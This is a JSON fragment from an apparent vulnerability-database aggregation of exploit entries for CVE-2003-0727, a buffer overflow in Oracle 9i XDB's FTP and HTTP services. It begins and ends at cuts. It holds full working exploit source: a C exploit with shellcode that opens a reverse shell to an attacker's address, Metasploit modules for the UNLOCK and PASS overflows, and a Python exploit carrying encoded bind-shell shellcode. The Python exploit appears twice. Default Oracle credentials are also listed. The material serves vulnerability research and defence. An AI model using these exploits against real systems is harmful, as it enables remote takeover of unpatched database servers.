\nreq = \"Authorization: Basic #{Rex::Text.encode_base64(sploit)}\\r\\n\\r\\n\" \n \nres = \"GET / HTTP/1.1\\r\\n\" + \"Host: #{rhost}:#{rport}\\r\\n\" + req \n \nprint_status(\"Trying target %s...\" % target.name) \n \nsock.put(res) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/82937/oracle9i_xdb_pass.rb.txt", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-14T03:45:10", "description": "", "cvss3": {}, "published": "2017-08-12T00:00:00", "type": "packetstorm", "title": "Oracle XDB FTP Service UNLOCK Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2017-08-12T00:00:00", "id": 
"PACKETSTORM:144108", "href": "https://packetstormsecurity.com/files/144108/Oracle-XDB-FTP-Service-UNLOCK-Buffer-Overflow.html", "sourceData": "`/* Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit */ \n/* David Litchfield from ngssoftware (at Blackhat 2003)*/ \n/* */ \n/* Original Advisory : */ \n/* http://www.blackhat.com/presentations/bh-usa-03/bh- */ \n/* us-03-litchfield-paper.pdf */ \n \n \n#include <stdio.h> \n#include <windows.h> \n#include <winsock.h> \n \nint GainControlOfOracle(char *, char *); \nint StartWinsock(void); \nint SetUpExploit(char *,int); \n \nstruct sockaddr_in s_sa; \nstruct hostent *he; \nunsigned int addr; \nchar host[260]=\"\"; \n \nunsigned char exploit[508]= \n\"\\x55\\x8B\\xEC\\xEB\\x03\\x5B\\xEB\\x05\\xE8\\xF8\\xFF\\xFF\\xFF\\xBE\\xFF\\xFF\" \n\"\\xFF\\xFF\\x81\\xF6\\xDC\\xFE\\xFF\\xFF\\x03\\xDE\\x33\\xC0\\x50\\x50\\x50\\x50\" \n\"\\x50\\x50\\x50\\x50\\x50\\x50\\xFF\\xD3\\x50\\x68\\x61\\x72\\x79\\x41\\x68\\x4C\" \n\"\\x69\\x62\\x72\\x68\\x4C\\x6F\\x61\\x64\\x54\\xFF\\x75\\xFC\\xFF\\x55\\xF4\\x89\" \n\"\\x45\\xF0\\x83\\xC3\\x63\\x83\\xC3\\x5D\\x33\\xC9\\xB1\\x4E\\xB2\\xFF\\x30\\x13\" \n\"\\x83\\xEB\\x01\\xE2\\xF9\\x43\\x53\\xFF\\x75\\xFC\\xFF\\x55\\xF4\\x89\\x45\\xEC\" \n\"\\x83\\xC3\\x10\\x53\\xFF\\x75\\xFC\\xFF\\x55\\xF4\\x89\\x45\\xE8\\x83\\xC3\\x0C\" \n\"\\x53\\xFF\\x55\\xF0\\x89\\x45\\xF8\\x83\\xC3\\x0C\\x53\\x50\\xFF\\x55\\xF4\\x89\" \n\"\\x45\\xE4\\x83\\xC3\\x0C\\x53\\xFF\\x75\\xF8\\xFF\\x55\\xF4\\x89\\x45\\xE0\\x83\" \n\"\\xC3\\x0C\\x53\\xFF\\x75\\xF8\\xFF\\x55\\xF4\\x89\\x45\\xDC\\x83\\xC3\\x08\\x89\" \n\"\\x5D\\xD8\\x33\\xD2\\x66\\x83\\xC2\\x02\\x54\\x52\\xFF\\x55\\xE4\\x33\\xC0\\x33\" \n\"\\xC9\\x66\\xB9\\x04\\x01\\x50\\xE2\\xFD\\x89\\x45\\xD4\\x89\\x45\\xD0\\xBF\\x0A\" \n\"\\x01\\x01\\x26\\x89\\x7D\\xCC\\x40\\x40\\x89\\x45\\xC8\\x66\\xB8\\xFF\\xFF\\x66\" \n\"\\x35\\xFF\\xCA\\x66\\x89\\x45\\xCA\\x6A\\x01\\x6A\\x02\\xFF\\x55\\xE0\\x89\\x45\" 
\n\"\\xE0\\x6A\\x10\\x8D\\x75\\xC8\\x56\\x8B\\x5D\\xE0\\x53\\xFF\\x55\\xDC\\x83\\xC0\" \n\"\\x44\\x89\\x85\\x58\\xFF\\xFF\\xFF\\x83\\xC0\\x5E\\x83\\xC0\\x5E\\x89\\x45\\x84\" \n\"\\x89\\x5D\\x90\\x89\\x5D\\x94\\x89\\x5D\\x98\\x8D\\xBD\\x48\\xFF\\xFF\\xFF\\x57\" \n\"\\x8D\\xBD\\x58\\xFF\\xFF\\xFF\\x57\\x33\\xC0\\x50\\x50\\x50\\x83\\xC0\\x01\\x50\" \n\"\\x83\\xE8\\x01\\x50\\x50\\x8B\\x5D\\xD8\\x53\\x50\\xFF\\x55\\xEC\\xFF\\x55\\xE8\" \n\"\\x60\\x33\\xD2\\x83\\xC2\\x30\\x64\\x8B\\x02\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\" \n\"\\x8B\\x50\\x08\\x52\\x8B\\xC2\\x8B\\xF2\\x8B\\xDA\\x8B\\xCA\\x03\\x52\\x3C\\x03\" \n\"\\x42\\x78\\x03\\x58\\x1C\\x51\\x6A\\x1F\\x59\\x41\\x03\\x34\\x08\\x59\\x03\\x48\" \n\"\\x24\\x5A\\x52\\x8B\\xFA\\x03\\x3E\\x81\\x3F\\x47\\x65\\x74\\x50\\x74\\x08\\x83\" \n\"\\xC6\\x04\\x83\\xC1\\x02\\xEB\\xEC\\x83\\xC7\\x04\\x81\\x3F\\x72\\x6F\\x63\\x41\" \n\"\\x74\\x08\\x83\\xC6\\x04\\x83\\xC1\\x02\\xEB\\xD9\\x8B\\xFA\\x0F\\xB7\\x01\\x03\" \n\"\\x3C\\x83\\x89\\x7C\\x24\\x44\\x8B\\x3C\\x24\\x89\\x7C\\x24\\x4C\\x5F\\x61\\xC3\" \n\"\\x90\\x90\\x90\\xBC\\x8D\\x9A\\x9E\\x8B\\x9A\\xAF\\x8D\\x90\\x9C\\x9A\\x8C\\x8C\" \n\"\\xBE\\xFF\\xFF\\xBA\\x87\\x96\\x8B\\xAB\\x97\\x8D\\x9A\\x9E\\x9B\\xFF\\xFF\\xA8\" \n\"\\x8C\\xCD\\xA0\\xCC\\xCD\\xD1\\x9B\\x93\\x93\\xFF\\xFF\\xA8\\xAC\\xBE\\xAC\\x8B\" \n\"\\x9E\\x8D\\x8B\\x8A\\x8F\\xFF\\xFF\\xA8\\xAC\\xBE\\xAC\\x90\\x9C\\x94\\x9A\\x8B\" \n\"\\xBE\\xFF\\xFF\\x9C\\x90\\x91\\x91\\x9A\\x9C\\x8B\\xFF\\x9C\\x92\\x9B\\xFF\\xFF\" \n\"\\xFF\\xFF\\xFF\\xFF\"; \n \nchar exploit_code[8000]= \n\"UNLOCK / aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnn\" \n\"nooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzzAAAAAABBBBCCCCD\" \n\"DDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSST\" \n\"TTTUUUUVVVVWWWWXXXXYYYYZZZZabcdefghijklmnopqrstuvwxyzABCDEFGHIJK\" \n\"LMNOPQRSTUVWXYZ0000999988887777666655554444333322221111098765432\" \n\"1aaaabbbbcc\"; \n \n \nchar exception_handler[8]=\"\\x79\\x9B\\xf7\\x77\"; \nchar 
short_jump[8]=\"\\xEB\\x06\\x90\\x90\"; \n \n \nint main(int argc, char *argv[]) \n{ \nif(argc != 6) \n{ \nprintf(\"\\n\\n\\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit\"); \nprintf(\"\\n\\t\\tfor Blackhat (http://www.blackhat.com)\"); \nprintf(\"\\n\\n\\tSpawns a reverse shell to specified port\"); \nprintf(\"\\n\\n\\tUsage:\\t%s host userid password ipaddress port\",argv[0]); \nprintf(\"\\n\\n\\tDavid Litchfield\\n\\t(david@ngssoftware.com)\"); \nprintf(\"\\n\\t6th July 2003\\n\\n\\n\"); \nreturn 0; \n} \nstrncpy(host,argv[1],250); \nif(StartWinsock()==0) \nreturn printf(\"Error starting Winsock.\\n\"); \nSetUpExploit(argv[4],atoi(argv[5])); \nstrcat(exploit_code,short_jump); \nstrcat(exploit_code,exception_handler); \nstrcat(exploit_code,exploit); \nstrcat(exploit_code,\"\\r\\n\"); \n \n \nGainControlOfOracle(argv[2],argv[3]); \nreturn 0; \n} \n \n \nint SetUpExploit(char *myip, int myport) \n{ \nunsigned int ip=0; \nunsigned short prt=0; \nchar *ipt=\"\"; \nchar *prtt=\"\"; \n \n \nip = inet_addr(myip); \nipt = (char*)&ip; \nexploit[191]=ipt[0]; \nexploit[192]=ipt[1]; \nexploit[193]=ipt[2]; \nexploit[194]=ipt[3]; \n// set the TCP port to connect on \n// netcat should be listening on this port \n// e.g. 
nc -l -p 80 \n \nprt = htons((unsigned short)myport); \nprt = prt ^ 0xFFFF; \nprtt = (char *) &prt; \nexploit[209]=prtt[0]; \nexploit[210]=prtt[1]; \nreturn 0; \n} \n \n \nint StartWinsock() { \nint err=0; WORD wVersionRequested; \nWSADATA wsaData; \nwVersionRequested = MAKEWORD( 2, 0 ); \nerr = WSAStartup( wVersionRequested, &wsaData ); \nif ( err != 0 ) \nreturn 0; \n \nif ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 ) \n{ WSACleanup( ); \nreturn 0; } \n \n \nif (isalpha(host[0])) { \nhe = gethostbyname(host); \ns_sa.sin_addr.s_addr=INADDR_ANY; \ns_sa.sin_family=AF_INET; \nmemcpy(&s_sa.sin_addr,he->h_addr,he->h_length); \n} else \n{ addr = inet_addr(host); \ns_sa.sin_addr.s_addr=INADDR_ANY; \ns_sa.sin_family=AF_INET; \nmemcpy(&s_sa.sin_addr,&addr,4); \nhe = (struct hostent *)1; \n} \nif (he == NULL) { \nreturn 0; } \nreturn 1; } \n \n \nint GainControlOfOracle(char *user, char *pass) { \nchar usercmd[260]=\"user \"; \nchar passcmd[260]=\"pass \"; \nchar resp[1600]=\"\"; \nint snd=0,rcv=0; \nstruct sockaddr_in r_addr; \nSOCKET sock; \n \n \nstrncat(usercmd,user,230); \nstrcat(usercmd,\"\\r\\n\"); \nstrncat(passcmd,pass,230); \nstrcat(passcmd,\"\\r\\n\"); \n \n \nsock=socket(AF_INET,SOCK_STREAM,0); \nif (sock==INVALID_SOCKET) \nreturn printf(\" sock error\"); \nr_addr.sin_family=AF_INET; r_addr.sin_addr.s_addr=INADDR_ANY; \nr_addr.sin_port=htons((unsigned short)0); \n \ns_sa.sin_port=htons((unsigned short)2100); \nif (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) return printf(\"Connect error\"); \nrcv = recv(sock,resp,1500,0); \nprintf(\"%s\",resp); \nZeroMemory(resp,1600); \nsnd=send(sock, usercmd , strlen(usercmd) , 0); \nrcv = recv(sock,resp,1500,0); \nprintf(\"%s\",resp); ZeroMemory(resp,1600); \n \n \nsnd=send(sock, passcmd , strlen(passcmd) , 0); \nrcv = recv(sock,resp,1500,0); \nprintf(\"%s\",resp); \nif(resp[0]=='5') \n{ closesocket(sock); \nreturn printf(\"Failed to log in using user %s and password 
%s.\\n\",user,pass); \n} \nZeroMemory(resp,1600); \nsnd=send(sock, exploit_code, strlen(exploit_code) , 0); \nSleep(2000); \nclosesocket(sock); \nreturn 0; \n} \n \n// milw0rm.com [2003-08-13] \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/144108/oraclexdbftp-overflow.txt", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:17:10", "description": "", "cvss3": {}, "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Oracle 9i XDB FTP UNLOCK Overflow (win32)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:82958", "href": "https://packetstormsecurity.com/files/82958/Oracle-9i-XDB-FTP-UNLOCK-Overflow-win32.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Ftp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Oracle 9i XDB FTP UNLOCK Overflow (win32)', \n'Description' => %q{ \nBy passing an overly long token to the UNLOCK command, a \nstack based buffer overflow occurs. David Litchfield, has \nillustrated multiple vulnerabilities in the Oracle 9i XML \nDatabase (XDB), during a seminar on \"Variations in exploit \nmethods between Linux and Windows\" presented at the Blackhat \nconference. Oracle9i includes a number of default accounts, \nincluding dbsnmp:dbsmp, scott:tiger, system:manager, and \nsys:change_on_install. 
\n \n}, \n'Author' => [ 'MC', 'David Litchfield <david@ngssoftware.com>' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2003-0727'], \n[ 'OSVDB', '2449'], \n[ 'BID', '8375'], \n[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'], \n \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 800, \n'BadChars' => \"\\x00\\x20\\x0a\\x0d\", \n'StackAdjustment' => -3500, \n \n}, \n'Targets' => \n[ \n[ \n'Oracle 9.2.0.1 Universal', \n{ \n'Platform' => 'win', \n'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret) \n}, \n], \n], \n'DisclosureDate' => 'Aug 18 2003', \n'DefaultTarget' => 0)) \n \nregister_options( [ \nOpt::RPORT(2100), \nOptString.new('FTPUSER', [ false, 'The username to authenticate as', 'DBSNMP']), \nOptString.new('FTPPASS', [ false, 'The password to authenticate with', 'DBSNMP']), \n], self.class ) \nend \n \ndef check \nconnect \ndisconnect \nif (banner =~ /9\\.2\\.0\\.1\\.0/) \nreturn Exploit::CheckCode::Vulnerable \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect_login \n \nprint_status(\"Trying target #{target.name}...\") \n \nbuf = rand_text_english(1130, payload_badchars) \nseh = generate_seh_payload(target.ret) \nbuf[322, seh.length] = seh \n \nsend_cmd( ['UNLOCK', '/', buf] , false ) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/82958/oracle9i_xdb_ftp_unlock.rb.txt", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-26T18:00:43", "description": "", "cvss3": {}, "published": "2017-09-26T00:00:00", "type": "packetstorm", "title": "Oracle 9i XDB 9.2.01 HTTP PASS Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2017-09-26T00:00:00", "id": "PACKETSTORM:144341", "href": 
"https://packetstormsecurity.com/files/144341/Oracle-9i-XDB-9.2.01-HTTP-PASS-Buffer-Overflow.html", "sourceData": "`#Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow \n#Date: 09/25/2017 \n#Exploit Author: Charles Dardaman \n#Twitter: https://twitter.com/CharlesDardaman \n#Website: http://www.dardaman.com \n#Version:9.2.0.1 \n#Tested on: Windows 2000 SP4 \n#CVE: 2003-0727 \n#This is a modified stand alone exploit of https://www.exploit-db.com/exploits/16809/ \n \n#!/usr/bin/python \n \n \nimport socket, sys, base64 \n \n#usage ./oracle9i_xbd_pass <target ip> <target port> \n \nrhost = sys.argv[1] #target ip \nrport = int(sys.argv[2]) #target port \n \n#Variables: \nret = \"\\x46\\x6d\\x61\\x60\" #0x60616d46 Little endian form \nnop = \"\\x90\" \npre = \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\" #This has to be prepended into the shellcode. \n \n#msfvenom -p windows/shell_bind_tcp lport=9989 exitfunc=thread -f py -b \"\\x00\" -e x86/shikata_ga_nai \n#355 bytes \npayload = \"\" \npayload += pre \npayload += \"\\xba\\x64\\xdb\\x93\\xe7\\xda\\xd6\\xd9\\x74\\x24\\xf4\\x58\\x29\" \npayload += \"\\xc9\\xb1\\x53\\x31\\x50\\x12\\x83\\xc0\\x04\\x03\\x34\\xd5\\x71\" \npayload += \"\\x12\\x48\\x01\\xf7\\xdd\\xb0\\xd2\\x98\\x54\\x55\\xe3\\x98\\x03\" \npayload += \"\\x1e\\x54\\x29\\x47\\x72\\x59\\xc2\\x05\\x66\\xea\\xa6\\x81\\x89\" \npayload += \"\\x5b\\x0c\\xf4\\xa4\\x5c\\x3d\\xc4\\xa7\\xde\\x3c\\x19\\x07\\xde\" \npayload += \"\\x8e\\x6c\\x46\\x27\\xf2\\x9d\\x1a\\xf0\\x78\\x33\\x8a\\x75\\x34\" \npayload += \"\\x88\\x21\\xc5\\xd8\\x88\\xd6\\x9e\\xdb\\xb9\\x49\\x94\\x85\\x19\" \npayload += \"\\x68\\x79\\xbe\\x13\\x72\\x9e\\xfb\\xea\\x09\\x54\\x77\\xed\\xdb\" \npayload += \"\\xa4\\x78\\x42\\x22\\x09\\x8b\\x9a\\x63\\xae\\x74\\xe9\\x9d\\xcc\" \npayload += \"\\x09\\xea\\x5a\\xae\\xd5\\x7f\\x78\\x08\\x9d\\xd8\\xa4\\xa8\\x72\" \npayload += \"\\xbe\\x2f\\xa6\\x3f\\xb4\\x77\\xab\\xbe\\x19\\x0c\\xd7\\x4b\\x9c\" \npayload += 
\"\\xc2\\x51\\x0f\\xbb\\xc6\\x3a\\xcb\\xa2\\x5f\\xe7\\xba\\xdb\\xbf\" \npayload += \"\\x48\\x62\\x7e\\xb4\\x65\\x77\\xf3\\x97\\xe1\\xb4\\x3e\\x27\\xf2\" \npayload += \"\\xd2\\x49\\x54\\xc0\\x7d\\xe2\\xf2\\x68\\xf5\\x2c\\x05\\x8e\\x2c\" \npayload += \"\\x88\\x99\\x71\\xcf\\xe9\\xb0\\xb5\\x9b\\xb9\\xaa\\x1c\\xa4\\x51\" \npayload += \"\\x2a\\xa0\\x71\\xcf\\x22\\x07\\x2a\\xf2\\xcf\\xf7\\x9a\\xb2\\x7f\" \npayload += \"\\x90\\xf0\\x3c\\xa0\\x80\\xfa\\x96\\xc9\\x29\\x07\\x19\\xd2\\xac\" \npayload += \"\\x8e\\xff\\x76\\xbf\\xc6\\xa8\\xee\\x7d\\x3d\\x61\\x89\\x7e\\x17\" \npayload += \"\\xd9\\x3d\\x36\\x71\\xde\\x42\\xc7\\x57\\x48\\xd4\\x4c\\xb4\\x4c\" \npayload += \"\\xc5\\x52\\x91\\xe4\\x92\\xc5\\x6f\\x65\\xd1\\x74\\x6f\\xac\\x81\" \npayload += \"\\x15\\xe2\\x2b\\x51\\x53\\x1f\\xe4\\x06\\x34\\xd1\\xfd\\xc2\\xa8\" \npayload += \"\\x48\\x54\\xf0\\x30\\x0c\\x9f\\xb0\\xee\\xed\\x1e\\x39\\x62\\x49\" \npayload += \"\\x05\\x29\\xba\\x52\\x01\\x1d\\x12\\x05\\xdf\\xcb\\xd4\\xff\\x91\" \npayload += \"\\xa5\\x8e\\xac\\x7b\\x21\\x56\\x9f\\xbb\\x37\\x57\\xca\\x4d\\xd7\" \npayload += \"\\xe6\\xa3\\x0b\\xe8\\xc7\\x23\\x9c\\x91\\x35\\xd4\\x63\\x48\\xfe\" \npayload += \"\\xf4\\x81\\x58\\x0b\\x9d\\x1f\\x09\\xb6\\xc0\\x9f\\xe4\\xf5\\xfc\" \npayload += \"\\x23\\x0c\\x86\\xfa\\x3c\\x65\\x83\\x47\\xfb\\x96\\xf9\\xd8\\x6e\" \npayload += \"\\x98\\xae\\xd9\\xba\" \n \n \n \nexploit = \"AAAA:\" + \"B\"*442 + \"\\xeb\\x64\" + (nop*2) + ret + (nop*266) +\"\\xeb\\x10\" + (nop*109) + payload + (nop * (400-len(payload))) \n \n \nrequest = \"GET / HTTP/1.1\\r\\n\" + \"Host: \" + rhost + \":\" + str(rport) + \"\\r\\n\" + \"Authorization: Basic \" + base64.b64encode(exploit) + \"\\r\\n\\r\\n\" \n \nprint (\"Attacking \" + rhost + \":\" + str(rport)) \n \n#Connect to the target \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((rhost,rport)) \n#Send exploit \ns.send(request) \ns.close() \n \nprint (\"Try to connect on port 9989.\") \n \n`\n", "sourceHref": 
"https://packetstormsecurity.com/files/download/144341/oracle9ixdb-overflow.txt", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:16:00", "description": "", "cvss3": {}, "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Oracle 9i XDB FTP PASS Overflow (win32)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83144", "href": "https://packetstormsecurity.com/files/83144/Oracle-9i-XDB-FTP-PASS-Overflow-win32.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Ftp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Oracle 9i XDB FTP PASS Overflow (win32)', \n'Description' => %q{ \nBy passing an overly long string to the PASS command, a \nstack based buffer overflow occurs. David Litchfield, has \nillustrated multiple vulnerabilities in the Oracle 9i XML \nDatabase (XDB), during a seminar on \"Variations in exploit \nmethods between Linux and Windows\" presented at the Blackhat \nconference. 
\n \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2003-0727'], \n[ 'OSVDB', '2449'], \n[ 'BID', '8375'], \n[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 800, \n'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x22\\x25\\x26\\x27\\x2b\\x2f\\x3a\\x3c\\x3e\\x3f\\x40\", \n'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\", \n}, \n'Targets' => \n[ \n[ \n'Oracle 9.2.0.1 Universal', \n{ \n'Platform' => 'win', \n'Ret' => 0x60616d46, # oraclient9.dll (pop/pop/ret) \n}, \n], \n], \n'DisclosureDate' => 'Aug 18 2003', \n'DefaultTarget' => 0)) \n \nregister_options([Opt::RPORT(2100),], self.class) \nderegister_options('FTPUSER', 'FTPPASS') \n \nend \n \n \ndef check \nconnect \ndisconnect \nif (banner =~ /9\\.2\\.0\\.1\\.0/) \nreturn Exploit::CheckCode::Vulnerable \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect \n \nuser = rand_text_alpha_upper(10) \nsploit = rand_text_alpha_upper(442) + Rex::Arch::X86.jmp_short(6) \nsploit << make_nops(2) + [target.ret].pack('V') + payload.encoded \n \nprint_status(\"Trying target #{target.name}...\") \n \nsend_cmd( ['USER', user], true ) \nsend_cmd( ['PASS', sploit], false ) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/83144/oracle9i_xdb_ftp_pass.rb.txt", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-03-02T03:36:46", "description": "Oracle 9i XDB version 9.2.0.1 HTTP PASS buffer overflow exploit.", "cvss3": {}, "published": "2017-09-26T00:00:00", "type": "zdt", "title": "Oracle 9i XDB 9.2.01 HTTP PASS Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2017-09-26T00:00:00", "id": 
"1337DAY-ID-28634", "href": "https://0day.today/exploit/description/28634", "sourceData": "#Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow\r\n#Date: 09/25/2017\r\n#Exploit Author: Charles Dardaman\r\n#Twitter: https://twitter.com/CharlesDardaman\r\n#Website: http://www.dardaman.com\r\n#Version:9.2.0.1\r\n#Tested on: Windows 2000 SP4\r\n#CVE: 2003-0727\r\n#This is a modified stand alone exploit of https://www.exploit-db.com/exploits/16809/\r\n \r\n#!/usr/bin/python\r\n \r\n \r\nimport socket, sys, base64\r\n \r\n#usage ./oracle9i_xbd_pass <target ip> <target port>\r\n \r\nrhost = sys.argv[1] #target ip\r\nrport = int(sys.argv[2]) #target port\r\n \r\n#Variables:\r\nret = \"\\x46\\x6d\\x61\\x60\" #0x60616d46 Little endian form\r\nnop = \"\\x90\"\r\npre = \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\" #This has to be prepended into the shellcode.\r\n \r\n#msfvenom -p windows/shell_bind_tcp lport=9989 exitfunc=thread -f py -b \"\\x00\" -e x86/shikata_ga_nai\r\n#355 bytes\r\npayload = \"\"\r\npayload += pre\r\npayload += \"\\xba\\x64\\xdb\\x93\\xe7\\xda\\xd6\\xd9\\x74\\x24\\xf4\\x58\\x29\"\r\npayload += \"\\xc9\\xb1\\x53\\x31\\x50\\x12\\x83\\xc0\\x04\\x03\\x34\\xd5\\x71\"\r\npayload += \"\\x12\\x48\\x01\\xf7\\xdd\\xb0\\xd2\\x98\\x54\\x55\\xe3\\x98\\x03\"\r\npayload += \"\\x1e\\x54\\x29\\x47\\x72\\x59\\xc2\\x05\\x66\\xea\\xa6\\x81\\x89\"\r\npayload += \"\\x5b\\x0c\\xf4\\xa4\\x5c\\x3d\\xc4\\xa7\\xde\\x3c\\x19\\x07\\xde\"\r\npayload += \"\\x8e\\x6c\\x46\\x27\\xf2\\x9d\\x1a\\xf0\\x78\\x33\\x8a\\x75\\x34\"\r\npayload += \"\\x88\\x21\\xc5\\xd8\\x88\\xd6\\x9e\\xdb\\xb9\\x49\\x94\\x85\\x19\"\r\npayload += \"\\x68\\x79\\xbe\\x13\\x72\\x9e\\xfb\\xea\\x09\\x54\\x77\\xed\\xdb\"\r\npayload += \"\\xa4\\x78\\x42\\x22\\x09\\x8b\\x9a\\x63\\xae\\x74\\xe9\\x9d\\xcc\"\r\npayload += \"\\x09\\xea\\x5a\\xae\\xd5\\x7f\\x78\\x08\\x9d\\xd8\\xa4\\xa8\\x72\"\r\npayload += \"\\xbe\\x2f\\xa6\\x3f\\xb4\\x77\\xab\\xbe\\x19\\x0c\\xd7\\x4b\\x9c\"\r\npayload += 
\"\\xc2\\x51\\x0f\\xbb\\xc6\\x3a\\xcb\\xa2\\x5f\\xe7\\xba\\xdb\\xbf\"\r\npayload += \"\\x48\\x62\\x7e\\xb4\\x65\\x77\\xf3\\x97\\xe1\\xb4\\x3e\\x27\\xf2\"\r\npayload += \"\\xd2\\x49\\x54\\xc0\\x7d\\xe2\\xf2\\x68\\xf5\\x2c\\x05\\x8e\\x2c\"\r\npayload += \"\\x88\\x99\\x71\\xcf\\xe9\\xb0\\xb5\\x9b\\xb9\\xaa\\x1c\\xa4\\x51\"\r\npayload += \"\\x2a\\xa0\\x71\\xcf\\x22\\x07\\x2a\\xf2\\xcf\\xf7\\x9a\\xb2\\x7f\"\r\npayload += \"\\x90\\xf0\\x3c\\xa0\\x80\\xfa\\x96\\xc9\\x29\\x07\\x19\\xd2\\xac\"\r\npayload += \"\\x8e\\xff\\x76\\xbf\\xc6\\xa8\\xee\\x7d\\x3d\\x61\\x89\\x7e\\x17\"\r\npayload += \"\\xd9\\x3d\\x36\\x71\\xde\\x42\\xc7\\x57\\x48\\xd4\\x4c\\xb4\\x4c\"\r\npayload += \"\\xc5\\x52\\x91\\xe4\\x92\\xc5\\x6f\\x65\\xd1\\x74\\x6f\\xac\\x81\"\r\npayload += \"\\x15\\xe2\\x2b\\x51\\x53\\x1f\\xe4\\x06\\x34\\xd1\\xfd\\xc2\\xa8\"\r\npayload += \"\\x48\\x54\\xf0\\x30\\x0c\\x9f\\xb0\\xee\\xed\\x1e\\x39\\x62\\x49\"\r\npayload += \"\\x05\\x29\\xba\\x52\\x01\\x1d\\x12\\x05\\xdf\\xcb\\xd4\\xff\\x91\"\r\npayload += \"\\xa5\\x8e\\xac\\x7b\\x21\\x56\\x9f\\xbb\\x37\\x57\\xca\\x4d\\xd7\"\r\npayload += \"\\xe6\\xa3\\x0b\\xe8\\xc7\\x23\\x9c\\x91\\x35\\xd4\\x63\\x48\\xfe\"\r\npayload += \"\\xf4\\x81\\x58\\x0b\\x9d\\x1f\\x09\\xb6\\xc0\\x9f\\xe4\\xf5\\xfc\"\r\npayload += \"\\x23\\x0c\\x86\\xfa\\x3c\\x65\\x83\\x47\\xfb\\x96\\xf9\\xd8\\x6e\"\r\npayload += \"\\x98\\xae\\xd9\\xba\"\r\n \r\n \r\n \r\nexploit = \"AAAA:\" + \"B\"*442 + \"\\xeb\\x64\" + (nop*2) + ret + (nop*266) +\"\\xeb\\x10\" + (nop*109) + payload + (nop * (400-len(payload)))\r\n \r\n \r\nrequest = \"GET / HTTP/1.1\\r\\n\" + \"Host: \" + rhost + \":\" + str(rport) + \"\\r\\n\" + \"Authorization: Basic \" + base64.b64encode(exploit) + 